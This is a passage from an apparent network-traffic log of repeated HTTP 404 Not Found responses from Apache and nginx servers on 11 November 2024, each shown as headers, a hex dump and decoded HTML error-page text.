6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 05:51:42 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 05:51:45 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 05:51:48 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 05:52:35 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66acf18b-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 05:52:37 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66acf18b-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 05:52:40 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66acf18b-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 05:52:42 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66acf18b-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 05:52:49 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 05:52:51 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 05:52:54 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 05:52:56 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 05:53:16 GMTContent-Type: text/htmlContent-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 05:53:18 GMTContent-Type: text/htmlContent-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 